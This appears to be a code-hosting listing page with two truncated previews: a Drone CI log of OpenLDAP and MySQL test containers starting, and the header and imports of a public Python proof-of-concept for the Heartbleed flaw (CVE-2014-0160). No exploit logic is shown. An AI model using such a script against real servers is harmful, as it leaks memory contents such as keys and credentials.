This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$ drone exec --local --build-event pull_request | |
[ldap:L0:0s] starting slapd on port 389 and 636... | |
[ldap:L1:0s] 5ce5582b @(#) $OpenLDAP: slapd (May 23 2018 04:25:19) $ | |
[ldap:L2:0s] Debian OpenLDAP Maintainers <[email protected]> | |
[ldap:L3:0s] 5ce5582b hdb_db_open: database "dc=planetexpress,dc=com": unclean shutdown detected; attempting recovery. | |
[ldap:L4:0s] 5ce5582b slapd starting | |
[mysql:L0:0s] Initializing database | |
[mysql:L1:0s] 2019-05-22T14:12:12.495661Z 0 [Warning] TIMESTAMP with implicit DEFAULT value is deprecated. Please use --explicit_defaults_for_timestamp server option (see documentation for more details). | |
[mysql:L2:0s] 2019-05-22T14:12:12.845444Z 0 [Warning] InnoDB: New log files created, LSN=45790 | |
[mysql:L3:0s] 2019-05-22T14:12:12.921506Z 0 [Warning] InnoDB: Creating foreign key constraint system tables. |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford ([email protected]) | |
# The author disclaims copyright to this source code. | |
# | |
# -shirk added TLS version | |
# -jpicht added SMTP STARTTLS hack | |
import sys | |
import struct |